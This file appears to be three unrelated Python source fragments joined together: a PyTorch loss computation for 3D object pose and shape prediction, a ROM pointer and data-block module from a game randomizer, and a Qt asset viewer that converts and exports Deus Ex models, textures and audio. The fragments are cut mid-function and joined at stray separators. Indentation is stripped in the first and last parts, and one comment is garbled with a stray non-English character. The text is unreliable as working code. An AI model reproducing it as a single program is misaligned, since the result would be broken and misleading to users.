s_loss = torch.nn.functional.binary_cross_entropy(code_pred['shape'],
code_gt['shape'])
else:
# print('Shape gt/pred mean : {}, {}'.format(code_pred[0].mean().data[0], code_gt[0].mean().data[0]))
s_loss = (code_pred['shape'] - code_gt['shape']).pow(2).mean()
if classify_rot and not gmm_rot:
q_loss = []
for code_pred_quat, code_gt_quat in zip(code_pred['quat'], code_gt['quat']):
q_loss.append(quat_nll_loss_or(code_pred_quat, code_gt_quat))
q_loss = torch.stack(q_loss).mean()
# pdb.set_trace()
# q_loss = torch.nn.functional.nll_loss(torch.nn.functional.log_softmax(code_pred[2]), code_gt[2])
# assert torch.abs(q_loss - q_loss2).data.cpu().sum() < 1E-4, 'Something incorrect in computation {} , {}'.format(q_loss.data[0], q_loss2.data[0])
elif var_gmm_rot:
assert quat_medoids is not None, 'Quat medoids not passed, cannot compute'
expected_log_var = math.log((2*3.14/180)**2)
one_by_sqrt_2pi_log = math.log(float(np.sqrt(1.0/(2*np.pi))))
mixture_weights, log_variances = code_pred['quat']
mixture_weights= torch.nn.functional.log_softmax(mixture_weights).exp()
# pdb.set_trace()
nll = []
if not train_var:
log_variances = log_variances * 1 + 0*expected_log_var
# pdb.set_trace()
for mixture_weight, log_variance, code_gt_quat in zip(mixture_weights, log_variances, code_gt['quat']):
qd = quat_dist(code_gt_quat.unsqueeze(1) , quat_medoids.unsqueeze(0)).pow(2)
mixture_weight = mixture_weight.unsqueeze(0).expand(qd.size())
log_variance = log_variance.unsqueeze(0).expand(qd.size())
per_mixture_prob = one_by_sqrt_2pi_log - 0.5*log_variance - qd/(1E-8 + 2*log_variance.exp())
log_prob = torch.log((mixture_weight*per_mixture_prob.exp()).sum(-1) + 1E-6)
log_prob = log_prob.mean()
nll.append(-1*log_prob)
q_loss = torch.cat(nll).mean()
elif gmm_rot:
assert quat_medoids is not None, 'Quat medoids not passed, cannot compute'
sigmasq = (2*3.14/180)**2
one_by_sqrt_2pi_sigmasq = float(np.sqrt(1.0/(2*np.pi*(sigmasq))))
log_one_by_sqrt_2pi_sigmasq = float(np.log(np.sqrt(1.0/(2*np.pi*(sigmasq)))))
# for code_pred_quat, code_gt_quat
mixture_weights = torch.nn.functional.log_softmax(code_pred['quat']).exp()
nll = []
for mixture_weight, code_gt_quat in zip(mixture_weights, code_gt['quat']):
qd = quat_dist(code_gt_quat.unsqueeze(1) , quat_medoids.unsqueeze(0)).pow(2)
mixture_weight = mixture_weight.unsqueeze(0).expand(qd.size())
per_mixture_prob = one_by_sqrt_2pi_sigmasq*mixture_weight*torch.exp(- qd/(1E-8 + 2*sigmasq))
log_prob = torch.log(per_mixture_prob.sum(-1) + 1E-6)
log_prob = log_prob.mean()
nll.append(-1*log_prob)
q_loss = torch.cat(nll).mean()
# pdb.set_trace()
else:
q_loss = quat_loss(code_pred['quat'], code_gt['quat'])
class_loss = 0*q_loss
if pred_class:
class_loss = torch.nn.functional.nll_loss(class_pred, class_gt)
sc_loss = (code_pred['scale'].log() - code_gt['scale'].log()).abs().mean()
tr_loss = (code_pred['trans'] - code_gt['trans']).pow(2).mean()
## batchify data and compute losses for examples:
if rel_opt:
## For translations.
trans_locations_batched = suncg_parse.batchify(code_pred['trans'], rois[:,0].data)
relative_trans_pred_batched = suncg_parse.batchify(relative_pred['relative_trans'], bIndices_pairs)
relative_trans_gt_batched = suncg_parse.batchify(relative_gt['relative_trans'], bIndices_pairs)
new_locs = []
# for locations, relative_locations in zip(trans_locations_batched, relative_trans_gt_batched):
for locations, relative_locations in zip(trans_locations_batched, relative_trans_pred_batched):
A, b = lsopt.get_matrix_Ab(len(locations), locations, relative_locations)
locations = torch.matmul(A, b)
new_locs.append(locations)
new_locs = torch.cat(new_locs, dim=0)
tr_loss += (new_locs - code_gt['trans']).pow(2).mean()
## For scales.
scales_batched = suncg_parse.batchify(code_pred['scale'].log(), rois[:,0].data)
relative_scales_pred_batched = suncg_parse.batchify(relative_pred['relative_scale'], bIndices_pairs)
relative_scales_gt_batched = suncg_parse.batchify(relative_gt['relative_scale'], bIndices_pairs)
new_scales = []
for scales, relative_scales in zip(scales_batched, relative_scales_pred_batched):
A, b = lsopt.get_matrix_Ab(len(scales), scales, relative_scales)
scales = torch.matmul(A, b)
new_scales.append(scales)
new_scales = torch.cat(new_scales, dim=0)
# pdb.set_trace()
sc_loss += (new_scales - code_gt['scale'].log()).abs().mean()
# tr_loss = torch.nn.functional.smooth_l1_loss(code_pred[3], code_gt[3])
rel_trans_loss = torch.zeros(1).cuda().mean()
rel_scale_loss = torch.zeros(1).cuda().mean()
rel_q_loss = torch.zeros(1).cuda().mean()
if pred_relative:
rel_trans_loss = (relative_pred['relative_trans'] - relative_gt['relative_trans']).pow(2).mean()
rel_scale_loss = (relative_pred['relative_scale'] - relative_gt['relative_scale']).abs().mean()
mask = relative_gt['relative_mask'].bool()
if classify_dir and not gmm_dir:
relative_dir_gt = relative_gt['relative_dir']
relative_pred_sel = torch.masked_select(relative_pred['relative_dir'], mask.unsqueeze(1).expand(relative_pred['relative_dir'].size()))
relative_pred_sel = relative_pred_sel.view(-1, relative_pred['relative_dir'].size(1))
# pdb.set_trace()
relative_gt_sel = [relative_dir_gt[i] for i, m in enumerate(mask) if m.item() == 1]
# if len(relative_pred_sel) > 0:
rel_q_loss = []
for pred_dir, gt_dir in zip(relative_pred_sel, relative_gt_sel):
rel_q_loss.append(quat_nll_loss_or(pred_dir, gt_dir))
rel_q_loss = torch.stack(rel_q_loss).mean()
# relative_gt_sel = torch.masked_select(torch.cat(relative_dir_gt), mask)
# if len(relative_pred_sel) > 0:
# rel_q_loss = torch.nn.functional.nll_loss(torch.nn.functional.log_softmax(relative_pred_sel), relative_gt_sel)
elif gmm_dir:
assert direction_medoids is not None, 'Quat medoids not passed, cannot compute'
expected_log_var = math.log((2*3.14/180)**2)
one_by_sqrt_2pi_log = math.log(float(np.sqrt(1.0/(2*np.pi))))
mixture_weights, rel_dir_log_variances = relative_pred['relative_dir']
size_rel = mixture_weights.size()
mixture_weights = torch.masked_select(mixture_weights, mask.unsqueeze(1).expand(size_rel))
mixture_weights = mixture_weights.view(-1, size_rel[1])
rel_dir_log_variances = torch.masked_select(rel_dir_log_variances, mask.unsqueeze(1).expand(size_rel))
rel_dir_log_variances = rel_dir_log_variances.view(-1, size_rel[1])
mixture_weights= torch.nn.functional.log_softmax(mixture_weights).exp()
trans_rotation = self.relative_gt['relative_dir']
trans_rotation = [trans_rotation[i] for i, m in enumerate(mask) if m.data[0] == 1]
# rel_dir_log_variances = 0*rel_dir_log_variances + 1*expected_log_var
rel_dir_log_variances = 1*rel_dir_log_variances + 0*expected_log_var
nll = []
for mixture_weight, log_variance, gt_trans_rot in zip(mixture_weights, rel_dir_log_variances, trans_rotation):
qd = dir_dist(gt_trans_rot.unsqueeze(1) , direction_medoids.unsqueeze(0)).pow(2)
mixture_weight = mixture_weight.unsqueeze(0).expand(qd.size())
log_variance = log_variance.unsqueeze(0).expand(qd.size())
per_mixture_prob = one_by_sqrt_2pi_log - 0.5*log_variance - qd/(1E-8 + 2*log_variance.exp())
log_prob = torch.log((mixture_weight*per_mixture_prob.exp()).sum(-1) + 1E-6)
log_prob = log_prob.mean()
nll.append(-1*log_prob)
rel_q_loss = torch.cat(nll).mean()
else:
relative_pred_sel = torch.masked_select(relative_pred['relative_dir'], mask.unsqueeze(1).expand(relative_pred[3].size()))
relative_pred_sel = relative_pred_sel.view(-1, relative_pred['relative_dir'].size(1))
# relative_pred_sel = torch.nn.functional.normalize(relative_pred_sel)
# pdb.set_trace()
relative_gt_sel = [relative_gt['relative_dir'][ix] for i, m in enumerate(mask) if m.data[0] == 1]
# if len(relative_pred_sel) > 0:
# trans_rotation = torch.cat(trans_rotation)
# relative_gt_sel = torch.masked_select(trans_rotation, mask.unsqueeze(1).expand(trans_rotation.size()))
# relative_gt_sel = relative_gt_sel.view(-1, trans_rotation.size(1))
if len(relative_pred_sel) > 0:
rel_q_loss = dir_loss1(relative_pred_sel, relative_gt_sel, average=True)
# rel_q_loss = dir_loss2(relative_pred_sel, relative_gt_sel, average=True)
# pdb.set_trace()
# rel_q_loss = rel_q_loss.mean()
total_loss = sc_loss * scale_wt
total_loss += q_loss * quat_wt
total_loss += tr_loss * trans_wt
total_loss += s_loss * shape_wt
if pred_relative:
total_loss += rel_trans_loss * rel_trans_wt
total_loss += rel_scale_loss * rel_trans_wt
total_loss += rel_q_loss
total_loss += class_loss * class_wt
loss_factors = {
'shape': s_loss * shape_wt, 'scale': sc_loss * scale_wt,
| |
<reponame>HansGR/WorldsCollide
from functools import total_ordering
@total_ordering
class DataPointer:
    """Location of a pointer in the rom plus the data address it stores.

    Pointers order primarily by the data address they point at, then by
    their own address.
    """
    def __init__(self, address, data_address):
        self.address = address
        self.data_address = data_address

    def _key(self):
        # Sort key shared by all comparisons.
        return (self.data_address, self.address)

    def __eq__(self, other):
        return self._key() == other._key()

    def __lt__(self, other):
        return self._key() < other._key()
# pointers to data
# number of pointers and pointer addresses do not change, only the data addresses they store change
class DataPointers:
    """Fixed-size table of pointers into a data region.

    The number of pointers and the pointer addresses never change; only the
    data addresses they store are rewritten.
    """
    def __init__(self, rom, start_address, end_address, pointer_size):
        self.rom = rom
        self.start_address = start_address
        self.end_address = end_address
        self.pointer_size = pointer_size
        # Largest address representable by one pointer.
        self.max_address = 2 ** (self.pointer_size * 8) - 1

        self.pointers = []
        for index in range(self.size() // self.pointer_size):
            address = self.start_address + index * self.pointer_size
            self.pointers.append(DataPointer(address, self._read_data_address(address)))

    def _read_data_address(self, address):
        """Decode the data address stored at the given pointer address."""
        if self.pointer_size == 4:
            # Four byte pointers are stored as pairs of 2 bytes
            # (e.g. 0x12345678 stored as 0x34127856).
            half = self.pointer_size // 2
            high = int.from_bytes(self.rom.get_bytes(address, half), byteorder="little")
            low = int.from_bytes(self.rom.get_bytes(address + half, half), byteorder="little")
            return (high << 16) | low
        raw = self.rom.get_bytes(address, self.pointer_size)
        return int.from_bytes(raw, byteorder="little")

    def size(self):
        # equivalent to len(self) * self.pointer_size
        return self.end_address - self.start_address + 1

    def __len__(self):
        return len(self.pointers)

    def __getitem__(self, index):
        return self.pointers[index].data_address

    def __setitem__(self, index, data_address):
        self.pointers[index].data_address = data_address

    def write(self):
        """Write every pointer's data address back to the rom."""
        if self.pointer_size == 4:
            # Write out four byte pointers as pairs of 2 bytes
            # (e.g. 0x12345678 as 0x34127856).
            half = self.pointer_size // 2
            for pointer in self.pointers:
                high = (pointer.data_address >> 16).to_bytes(half, "little")
                low = (pointer.data_address & 0xffff).to_bytes(half, "little")
                self.rom.set_bytes(pointer.address, high)
                self.rom.set_bytes(pointer.address + half, low)
        else:
            for pointer in self.pointers:
                raw = pointer.data_address.to_bytes(self.pointer_size, "little")
                self.rom.set_bytes(pointer.address, raw)
class DataElement:
    """A chunk of data paired with the rom address it came from."""
    def __init__(self, data, address):
        self.address = address
        self.data = data
# contiguous bit field
class DataBits:
    """Contiguous bit field backed by a byte range in the rom.

    Bits are indexed LSB-first within each byte.
    """
    def __init__(self, rom, start_address, end_address):
        self.rom = rom
        self.start_address = start_address
        self.end_address = end_address
        self.bytes = self.rom.get_bytes(self.start_address, self.size())

    def size(self):
        # Number of bytes (end address inclusive).
        return self.end_address - self.start_address + 1

    def set_all(self):
        for byte_index in range(self.size()):
            self.bytes[byte_index] = 0xff

    def clear_all(self):
        for byte_index in range(self.size()):
            self.bytes[byte_index] = 0x00

    def __len__(self):
        return self.size() * 8

    def __getitem__(self, index):
        byte_index, bit_index = divmod(index, 8)
        return (self.bytes[byte_index] >> bit_index) & 1

    def __setitem__(self, index, value):
        byte_index, bit_index = divmod(index, 8)
        bit = 1 << bit_index
        self.bytes[byte_index] = (self.bytes[byte_index] & ~bit) | (value << bit_index)

    def __str__(self):
        chunks = []
        for byte in self.bytes:
            chunks.append("".join("1" if byte & (1 << b) else "0" for b in range(8)))
            chunks.append(" ")
        return "".join(chunks)

    def write(self):
        self.rom.set_bytes(self.start_address, self.bytes)
# array of data
# all elements are the same size and the size does not change but the number of elements can change
class DataArray:
    """Array of same-sized elements in a contiguous rom region.

    The element size is fixed, but elements may be appended or deleted as
    long as the total stays within the original capacity at write time.
    """
    def __init__(self, rom, start_address, end_address, element_size):
        self.rom = rom
        self.start_address = start_address
        self.end_address = end_address
        self.element_size = element_size
        self.element_capacity = self.size() // self.element_size

        addresses = (self.start_address + index * self.element_size
                     for index in range(self.element_capacity))
        self.elements = [DataElement(self.rom.get_bytes(address, self.element_size), address)
                         for address in addresses]

    def size(self):
        # equivalent to len(self) * self.element_size
        return self.end_address - self.start_address + 1

    def __len__(self):
        return len(self.elements)

    def __getitem__(self, index):
        return self.elements[index].data

    def __setitem__(self, index, data):
        assert(len(data) == self.element_size)
        self.elements[index].data = data

    def __delitem__(self, index):
        # Shrink the occupied region along with the element count.
        del self.elements[index]
        self.end_address -= self.element_size

    def append(self, data):
        assert(len(data) == self.element_size)
        self.elements.append(DataElement(data, self.end_address))
        self.end_address += self.element_size

    def write(self):
        """Write every element back to the rom; fail if over capacity."""
        if len(self) > self.element_capacity:
            raise MemoryError(f"{self.__class__.__name__} write(): Not enough space ({len(self)}/{self.element_capacity} elements)")
        for element in self.elements:
            self.rom.set_bytes(element.address, element.data)
# pointers to arrays of data
# each array pointed to can be zero or more elements long and each element is the same size
# the number of pointers/arrays does not change but the array sizes can change
class DataArrays:
    """Collection of DataArray regions addressed through a pointer table.

    The pointer table stores each array's offset relative to
    data_start_address; the number of arrays is fixed, but each array's
    element count may change between construction and write().
    """
    def __init__(self, rom, pointers_start_address, pointers_end_address, pointer_size, data_start_address, data_end_address, data_element_size):
        self.rom = rom
        self.pointers = DataPointers(rom, pointers_start_address, pointers_end_address, pointer_size)
        self.start_address = data_start_address
        self.end_address = data_end_address  # inclusive per size() below
        self.element_size = data_element_size
        self.data_arrays = []
        # Each array spans from its own pointer up to the next pointer
        # (the last array runs to the end of the data region).
        for index in range(len(self)):
            start_address = self.start_address + self.pointers[index]
            if index < len(self) - 1:
                # NOTE(review): the next array's start offset is passed as an
                # end_address that DataArray treats as *inclusive*, which
                # looks one byte too large — confirm the intended
                # inclusive/exclusive convention.
                end_address = self.start_address + self.pointers[index + 1]
            else:
                end_address = self.end_address
            data_array = DataArray(self.rom, start_address, end_address, self.element_size)
            self.data_arrays.append(data_array)
    def size(self):
        # Total data-region size in bytes (end_address treated as inclusive).
        return self.end_address - self.start_address + 1
    def __len__(self):
        # equivalent to len(self.data_arrays) after initialization
        return len(self.pointers)
    def __getitem__(self, index):
        return self.data_arrays[index]
    def write(self):
        """Repack all arrays contiguously, rewrite the pointers, and flush."""
        data_address = self.start_address
        for index in range(len(self)):
            self.pointers[index] = data_address - self.start_address
            for element in self.data_arrays[index].elements:
                self.rom.set_bytes(data_address, element.data)
                data_address += self.element_size
                # NOTE(review): this overflow check runs *after* set_bytes,
                # so an overflowing element has already been written past
                # end_address when the exception is raised.
                if data_address > self.end_address:
                    raise MemoryError(f"{self.__class__.__name__} write(): Not enough space ({(data_address - self.start_address + 1) // self.element_size - 1}/{len(self)} elements)")
        self.pointers.write()
# pointers to blocks of data
# pointers are all the same size but data blocks can vary in size (or all be the same size)
# the number of pointers/blocks does not change but the sizes of blocks can change
#
# DataList: pointers are in the same order as they blocks they point to
# each block's index is the same as the index of the pointer pointing to it
#
# DataMap: pointers are not in the same order as the blocks they point to
# pointers must be sorted to find the size of each block
#
# DataList:
# pointer index: 0 1 2 3 4
# ---------------------
# block index: | 0 | 1 | 2 | 3 | 4 |
# ---------------------
# pointer 0 points to block 0, pointer 1 points to block 1, pointer 2 points to block 2, ...
# NOTE: DataList can also handle pointers which wrap around (i.e. dialogs)
# e.g. pointer 0 = 0xfffe (block 0 address = 0x0dfffe), pointer 1 = 0x000c (block 1 address = 0x0e000c)
#
# DataMap:
# pointer index: 0 1 2 3 4
# ---------------------
# block index: | 4 | 3 | 1 | 2 | 0 |
# ---------------------
# pointer 0 points to block 4, pointer 1 points to block 3, pointer 2 points to block 1, ...
class _DataBlocks:
    """Base for DataList/DataMap: fixed-count pointers to variable-size blocks.

    Subclasses must provide `self.sorted_indices` — the pointer indices
    ordered by the address of the block each one points to. Pointer values
    are offsets relative to `pointer_offset` and may wrap around
    `pointers.max_address + 1` (see the DataList note above this class).
    """
    def __init__(self, rom, pointers_start_address, pointers_end_address, pointer_size, pointer_offset, data_start_address, data_end_address):
        self.rom = rom
        self.pointers = DataPointers(rom, pointers_start_address, pointers_end_address, pointer_size)
        self.pointer_offset = pointer_offset
        self.data_blocks = [None] * len(self)  # filled by subclass / assign()
        self.start_address = data_start_address
        self.end_address = data_end_address  # inclusive per size() below
        self.free_space = 0  # bytes left in the data region; negative = overflow
    def size(self):
        return self.end_address - self.start_address + 1
    def __len__(self):
        # equivalent to len(self.data_blocks) after initialization
        return len(self.pointers)
    def __getitem__(self, index):
        return self.data_blocks[index]
    def __setitem__(self, index, data):
        # NOTE: every pointer after given index must be updated making this an O(n) operation
        # use assign to overwrite every data_block without O(n^2) complexity
        size_delta = len(self.data_blocks[index]) - len(data)
        self.data_blocks[index] = data
        if size_delta == 0:
            return
        # Shrinking a block (positive delta) frees space and shifts every
        # later block toward lower addresses; growing does the opposite.
        self.free_space += size_delta
        for pointer_index in self.sorted_indices[index + 1:]:
            self.pointers[pointer_index] -= size_delta
    def assign(self, data_blocks):
        """Replace all blocks at once, laying them out contiguously in address order."""
        address = self.start_address - self.pointer_offset
        for index, pointer_index in enumerate(self.sorted_indices):
            # Pointers are stored modulo their address space so they can wrap.
            self.pointers[pointer_index] = address % (self.pointers.max_address + 1)
            if pointer_index < len(data_blocks):
                self.data_blocks[pointer_index] = data_blocks[pointer_index]
                address += len(data_blocks[pointer_index])
            else:
                # Fewer blocks supplied than pointers: remaining blocks are empty.
                self.data_blocks[pointer_index] = []
        self.free_space = self.end_address - (address + self.pointer_offset) + 1
    def write(self):
        """Flush pointers and blocks to the ROM; raises if the region overflowed."""
        if self.free_space < 0:
            raise MemoryError(f"{self.__class__.__name__} write(): Not enough space ({self.free_space} bytes)")
        self.pointers.write()
        start_address = self.pointer_offset
        for index, pointer_index in enumerate(self.sorted_indices):
            if index > 0:
                prev_pointer_index = self.sorted_indices[index - 1]
                # A pointer smaller than its predecessor (in address order)
                # means the offsets wrapped past max_address.
                if self.pointers[pointer_index] < self.pointers[prev_pointer_index]:
                    start_address += self.pointers.max_address + 1 # pointer wrap around
            block_address = start_address + self.pointers[pointer_index]
            self.rom.set_bytes(block_address, self.data_blocks[pointer_index])
    def __str__(self):
        # Short summary: pointer table span, block region span, free space.
        result = f"{len(self.pointers)} pointers [{hex(self.pointers.start_address)}, {hex(self.pointers.end_address)}]\n"
        result += f"{len(self.data_blocks)} blocks [{hex(self.start_address)}, {hex(self.end_address)}]"
        result += f", {self.free_space} free bytes\n"
        return result
    def __repr__(self):
        # Full dump: one line per block (size, resolved address, bytes),
        # listed by pointer index, using the same wrap handling as write().
        result = [""] * len(self)
        start_address = self.pointer_offset
        for index, pointer_index in enumerate(self.sorted_indices):
            if index > 0:
                prev_pointer_index = self.sorted_indices[index - 1]
                if self.pointers[pointer_index] < self.pointers[prev_pointer_index]:
                    start_address += self.pointers.max_address + 1 # pointer wrap around
            result[pointer_index] = f"{pointer_index}: {len(self.data_blocks[pointer_index])}, {hex(start_address + self.pointers[pointer_index])}: {[hex(x) for x in self.data_blocks[pointer_index]]}"
        result = '\n'.join(result)
        return str(self) + result
    def print(self):
        print(str(self))
    def printr(self):
        print(repr(self))
class DataList(_DataBlocks):
def __init__(self, rom, pointers_start_address, pointers_end_address, pointer_size, pointer_offset, data_start_address, data_end_address):
super().__init__(rom, pointers_start_address, pointers_end_address, pointer_size, pointer_offset, data_start_address, data_end_address)
# pointers already sorted by address, create list of indices for base class convenience
self.sorted_indices = list(range(len(self)))
# original unused pointers can point beyond end address + 1, fix this first
start_address = self.pointer_offset
for index in range(len(self)):
address = start_address + self.pointers[index]
if address > self.end_address + 1:
self.pointers[index] = (self.end_address + 1) % (self.pointers.max_address + 1)
if index > 0 and self.pointers[index] | |
+= self.size_scale * dy
if self.scaleImage < 0:
self.scaleImage = 0.0
self.resize_image()
self.lastPos = event.pos()
    def resize_image(self):
        # Rescale the shared pixmap by the current zoom factor and re-centre
        # the label in the viewport, honouring the pan offsets (xOff/yOff).
        new_pix = vpPixmap.scaled(viewport.size()*self.scaleImage,
                                  aspectMode=Qt.KeepAspectRatio)
        self.resize(new_pix.size())
        c = viewport.rect().center()
        self.setPixmap(new_pix)
        self.move(c.x() - self.width() / 2 + self.xOff,
                  c.y() - self.height() / 2 + self.yOff)
class ImageParent(QLabel):
    """Host label for the zoomable image view; forwards its events to vpImage."""
    def resizeEvent(self, size):
        # Re-fit the child image whenever the container is resized.
        vpImage.reset_view()
    def mouseDoubleClickEvent(self, event):
        vpImage.mouseDoubleClickEvent(event)
    def wheelEvent(self, event):
        vpImage.wheelEvent(event)
    def mouseMoveEvent(self, event):
        vpImage.mouseMove(event)
    def mousePressEvent(self, event):
        # Remember the press position so subsequent moves can compute pan deltas.
        vpImage.lastPos = event.pos()
# Viewport image widgets: a plain host label containing the zoomable image view.
vpIBase = ImageParent(parent=viewport)
vpImage = ImageView(parent=vpIBase)
vpImage.setPixmap(QPixmap(1,1))
vpPixmap = QPixmap()  # shared source pixmap, replaced on每 preview is wrong — replaced by update_viewport()
# Overlay label showing the current file path/name at the top of the viewport.
vpFilename = QLabel("\n", parent=viewport)
vpFilename.setAlignment(Qt.AlignTop)
vpFilename.setFont(QFont("", 7))
vpFilename.setAutoFillBackground(True)
vpFilename.setStyleSheet("background-color: white")
vpTopLayout.setSpacing(0)
vpTopLayout.setContentsMargins(0, 0, 0, 0)
vpTopLayout.addWidget(vpFilename, 0)
# Stack the 3D view and the image view; update_viewport() picks which to show.
vpLayout.addWidget(vp3D)
vpLayout.addWidget(vpIBase)
vpTopLayout.addLayout(vpLayout, 1)
def convert_model(source, destination):
    """Convert a game model file to the format implied by destination's extension.

    Returns 0 on success, -1 when source does not exist, otherwise the
    converter's exit code. "bin" destinations are raw copies; .apx models go
    through XEPA2model.exe, everything else through a Blender batch script.
    """
    # NOTE(review): reads the module-global `file_name` (the display name with
    # the real extension) instead of `source`, which is always a hash-named
    # .bin file — appears intentional, but confirm.
    int_ext = file_name.split(".")[-1]
    ext = destination.split(".")[-1]
    if os.path.isfile(source):
        if ext == "bin":
            # Raw export: copy as-is; .apx additionally emits a converted .apb below.
            shutil.copyfile(source, destination)
            if int_ext != "apx":
                return 0
    else:
        return -1
    if int_ext == "apx":
        if ext != "stl":
            destination = destination[:-3] + "obj"
        if ext == "bin":
            destination = destination[:-3] + "apb"
        res = subprocess.call([lpath+"tools\\Models\\XEPA2model.exe",
                               source, destination],
                              shell=False)
    else:
        # Headless Blender run; converter output goes to a log file.
        log = open("blender_convert.log", "w")
        res = subprocess.call([blender, "-b", "-Y", "--addons",
                               "io_scene_DeusEx-MD", "-P",
                               lpath+"\\tools\\blender_script.py", "--",
                               source, destination],
                              shell=False, stdout=log)
        log.close()
    return res
def convert_image(source, destination):
    """Convert a game .tex texture to the format implied by destination.

    Two-stage pipeline: tex -> dds via tex_converter, then dds -> image via
    dds_converter (whose output format is set through its config.txt).
    Returns 0 on success, -1 when source is missing, non-zero otherwise.
    """
    ext = destination.split(".")[-1]
    if os.path.isfile(source):
        # "tex" export: raw copy, no conversion needed.
        if ext == "tex":
            shutil.copyfile(source, destination)
            return 0
    else:
        return -1
    res = subprocess.call([tex_converter, source,
                           tpath+"texture.dds"],
                          shell=False)
    if res == 0 and ext == "dds":
        shutil.copyfile(tpath+"texture.dds", destination)
        return 0
    if res == 0 and ext != "dds":
        # Remove a stale output so a failed conversion is detectable.
        if os.path.isfile(tpath+"texture."+ext):
            os.remove(tpath+"texture."+ext)
        #tif / png / tga / jpg
        conf_name = os.path.dirname(tex_converter) + "/config.txt"
        def set_tex_conf(path, ext):
            # Rewrite the dds converter's config with the requested output format.
            # NOTE(review): the raw-string config lines must stay at column 0.
            conf = open(path, "w")
            conf.write(r"""verbose = false
recursive = false
clean = true
merge_gloss = true
format = """)
            conf.write(ext)
            conf.close()
        # Only rewrite the config when its stored format differs.
        if os.path.isfile(conf_name):
            conf_file = open(conf_name, "r")
            conf = conf_file.readlines()
            conf_file.close()
            for line in conf:
                if line[:6] == "format" and line != "format = "+ext+"\n":
                    set_tex_conf(conf_name, ext)
                    break
        else:
            set_tex_conf(conf_name, ext)
        # Clear old converter log files before running it again.
        for file in os.listdir(os.path.dirname(tex_converter)):
            if file[:23] == "sctextureconverter_log_" and file[-4:] == ".txt":
                os.remove(os.path.dirname(tex_converter)+"\\"+file)
        res = subprocess.call([dds_converter, tpath],
                              shell=False, stdout=subprocess.DEVNULL)
        if res == 0:
            if destination != (tpath+"texture."+ext):
                shutil.copyfile(tpath+"texture."+ext, destination)
        return res
    else:
        return 1
def convert_audio(source, destination):
    """Extract all samples from an FSB5 (FMOD) sound bank.

    Each sample is written to `destination` + "." + <native extension>.
    Returns 0 on success, -1 when `source` does not exist, -2 on any
    parsing/rebuild failure.
    """
    if not os.path.isfile(source):
        return -1
    try:
        with open(source, "rb") as f:
            data = f.read()
        # A resource file may concatenate several FSB banks back to back.
        while data:
            fsb = fsb5.load(data)
            ext = fsb.get_sample_extension()
            data = data[fsb.raw_size:]
            for sample in fsb.samples:
                try:
                    sample_data = fsb.rebuild_sample(sample)
                except ValueError:
                    return -2
                # NOTE(review): every sample is written to the same name, so
                # later samples overwrite earlier ones — confirm whether an
                # index suffix was intended for multi-sample banks.
                with open(destination+"."+ext, "wb") as out:
                    out.write(sample_data)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate instead of being reported as a conversion failure.
        return -2
    return 0
def update_viewport(cur_file, file_title):
    """Convert the selected file to a previewable format and show it.

    3D models are converted to STL for the 3D page, textures to PNG for the
    image page; audio currently only updates the status bar.
    """
    global vpPixmap
    ext = file_title.split(".")[-1]
    if ext in types_3d:
        widget.statusBar().showMessage(app.translate("3DModel", "3d model"))
        res = convert_model(path+cur_file, tpath+"model.stl")
        if res == 0:
            vp3D.reload_model(tpath+"model.stl")
            #widget.statusBar().showMessage("Done!")
            vpLayout.setCurrentIndex(0)
        elif res == -1:
            widget.statusBar().showMessage(app.translate("FileNotFound",
                                                         "File not found"))
        else:
            widget.statusBar().showMessage(app.translate("CantConvert",
                                                         "Can't convert"))
    if ext in types_tex:
        widget.statusBar().showMessage(app.translate("Texture", "Texture"))
        viewport.setPixmap(QPixmap())
        res = convert_image(path+cur_file, tpath+"texture.png")
        if res == 0:
            vpPixmap = QPixmap(tpath+"texture.png")
            vpImage.reset_view()
            #widget.statusBar().showMessage("Done!")
            vpLayout.setCurrentIndex(1)
        elif res == -1:
            widget.statusBar().showMessage(app.translate("FileNotFound",
                                                         "File not found"))
        else:
            widget.statusBar().showMessage(app.translate("CantConvert",
                                                         "Can't convert"))
    if ext in types_audio:
        # No audio preview yet — just report the type.
        widget.statusBar().showMessage(app.translate("Audio", "Audio"))
def change_item(item):
    """Tree-selection handler: resolve the item to a game file and preview it."""
    global cur_file
    global file_name
    global file_parent
    global cur_hash
    global cur_item
    #if item == None or item == cur_item:
    #    return
    cur_item = item
    # Single-child containers stand in for the file itself; descend into it.
    if item.childCount() == 1:
        item = item.child(0)
    #if item == cur_item:
    #    return
    # Leaf items carry a 16-character hash in column 1 that names the .bin file.
    if item.childCount() == 0 and len(item.text(1)) == 16:
        cur_hash = item.text(1)
        cur_file = folder_tree.get(cur_hash+".bin", "")+\
                   "/"+cur_hash+".bin"
        file_name = item.text(0)
        file_parent = item.parent().text(0)
        vpFilename.setText(cur_file+"\n"+file_parent+" : "+file_name)
        update_viewport(cur_file, file_name)
tree.currentItemChanged.connect(change_item)
# Central layout
centre.setCollapsible(0, False)
centre.setCollapsible(1, False)
# Create file menu
file_menu = widget.menuBar().addMenu(app.translate("FileMenu", "File"))
# Add unpacking DEMD base
convertDEMDAction = QAction(app.translate("DEMDConvert", "Unpack game DB"),
                            widget)
# NOTE(review): "archieves" typo in the user-facing string below — fix in translations.
convertDEMDAction.setStatusTip(app.translate("DEMDTip", "Unpack game archieves"))
widget.connect(convertDEMDAction, SIGNAL("triggered()"), convert_DEMD_base)
file_menu.addAction(convertDEMDAction)
# Add base opening
openAction = QAction(app.translate("BaseOpen", "Open unpacked DB"), widget)
openAction.setStatusTip(app.translate("OpenTip", "Open game files in program"))
openAction.setShortcut("Ctrl+O")
widget.connect(openAction, SIGNAL("triggered()"), open_base)
file_menu.addAction(openAction)
file_menu.addSeparator()
def file_export():
    """Export the currently selected file through a save dialog.

    Dispatches on the file's extension: 3D models and textures go through
    the matching converter, audio through the FSB extractor, and anything
    else is copied verbatim. The result is shown in the status bar.
    """
    global file_name
    global file_parent
    global cur_hash
    global last_dir
    global last_filter
    # Nothing selected yet.
    if file_name == "" or cur_hash == "":
        return
    ext = file_name.split(".")[-1]
    if ext in types_3d:
        # Terrain meshes carry a generic name; use the parent's name instead.
        if file_name == "ground.weightedprim":
            name = file_parent.split(".")[0]
        else:
            name = file_name.split(".")[0]
        save_name = QFileDialog.getSaveFileName(
            caption=app.translate("Export3d", "Export model"),
            dir = last_dir+"\\"+name, filter = save_filter[0],
            selectedFilter = last_filter[0])
        if save_name[0] == "":
            return
        # Remember the chosen folder and filter for the next export.
        last_dir = os.path.dirname(save_name[0])
        last_filter[0] = save_name[1]
        res = convert_model(path+cur_file,
                            save_name[0])
        if res == 0:
            widget.statusBar().showMessage(app.translate("Ready", "Ready"))
        elif res == -1:
